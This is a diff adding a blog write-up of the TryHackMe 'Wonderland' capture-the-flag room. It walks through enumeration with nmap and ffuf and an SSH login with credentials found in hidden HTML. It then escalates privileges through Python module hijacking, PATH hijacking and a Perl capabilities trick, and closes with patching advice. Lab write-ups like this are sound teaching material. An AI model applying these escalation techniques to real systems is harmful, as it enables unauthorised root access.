add: writeup-ctf

content/writeup-ctf/writeup-wonderland-thm/index.md

@@ -0,0 +1,185 @@
+---
+title: "Writeup - Wonderland (THM)"
+date: 2022-05-20
+slug: "writeup-wonderland-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Wonderland](https://tryhackme.com/room/wonderland) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.6p1)
+- 80/tcp : HTTP web server
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I start by scanning the pages of the site:
+
+![](img/image-3.webp)
+
+When I go to the `r` page, I see the following message:
+
+![](img/image-4.webp)
+
+So I do a recursive scan to see the complete tree:
+
+
+```bash
+ffuf -c -u http://10.10.188.230/FUZZ -w wordlist/common.txt -recursion -recursion-depth 6
+```
+I finally find the following page:
+
+![](img/image-5.webp)
+
+I look at the source code of the page and find a `p` tag with a style that does not display it. The content of this tag looks very much like credentials...
+
+
+```html
+<!DOCTYPE html>
+
+<head>
+    <title>Enter wonderland</title>
+    <link rel="stylesheet" type="text/css" href="/main.css">
+</head>
+
+<body>
+    <h1>Open the door and enter wonderland</h1>
+    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
+    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
+    </p>
+    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
+        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
+    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
+    <img src="/img/alice_door.png" style="height: 50rem;">
+</body>
+```
+So I try to connect via SSH :
+
+![](img/image-6.webp)
+
+I now have a shell and can retrieve the first flag.
+
+
+```bash
+alice@wonderland:~$ cat /root/user.txt
+thm{"Curiouser and curiouser!"}
+```
+## Privilege escalation
+
+Looking at the contents of the `home` folder, I find several users:
+
+
+```bash
+alice@wonderland:/home$ ls
+alice  hatter  rabbit  tryhackme
+```
+I am now looking at my sudo permissions:
+
+![](img/image-7.webp)
+
+So I can run this python script with the `rabbit` user's permissions. So I look at the content of this script:
+
+
+```bash
+import random
+poem = """The sun was shining on the sea,
+Shining with all his might:
+He did his very best to make
+The billows smooth and bright —
+And this was odd, because it was
+[...]
+And that was scarcely odd, because
+They’d eaten every one."""
+
+for i in range(10):
+    line = random.choice(poem.split("\n"))
+    print("The line was:\t", line)
+```
+I run it to make sure I've got it right.
+
+![](img/image-8.webp)
+
+So it's a script that allows to output 10 random sentences from the text included in the script. Interestingly, the script uses `random`. So I create a `random.py` file in the same folder in which I insert a reverse shell. When the script is executed, it should use our file! So I create this new file with the following content :
+
+
+```bash
+import pty
+pty.spawn("/bin/bash")
+```
+I now run the script with the following command:
+
+![](img/image-9.webp)
+
+In the folder of this new user, we find the file `teaParty`. Using the `strings` command, I can find the following readable text:
+
+
+```bash
+[...]
+Welcome to the tea party!
+The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for him
+[...]
+```
+The program uses the `date` command, but interestingly, the program doesn't use an absolute path. So I'll be able to create a script with the same name, and then add the folder that contains this new script to the `$PATH` variable.
+
+I start by creating the script with the following content:
+
+
+```bash
+#!/bin/bash
+/bin/bash
+```
+Then I add the execution permissions and I add my personal folder at the beginning of the `PATH` variable.
+
+
+```bash
+chmod +x date
+export PATH=/home/rabbit:$PATH
+```
+I can now run the program :
+
+![](img/image-10.webp)
+
+In the personal folder of this new user I find the following file:
+
+
+```bash
+hatter@wonderland:/home/hatter$ ls
+password.txt
+hatter@wonderland:/home/hatter$ cat password.txt 
+WhyIsARavenLikeAWritingDesk?
+```
+So I try to connect via SSH with this password:
+
+![](img/image-11.webp)
+
+After some research to do a privilege elevation I find nothing. So I try to run linpeas.sh. By analyzing the output of the command I find the following lines:
+
+![](img/image-12.webp)
+
+By going on the [GTFObins de Perl](https://gtfobins.github.io/gtfobins/perl/#capabilities) I find a way to make a privilege elevation.
+
+Using the following command, I get a root shell and I can get the last flag.
+
+![](img/image-13.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave passwords in HTML code
+- Use absolute paths in programs
+- Do not leave clear passwords in files
+- Modify Perl permissions to avoid elevation of privilege.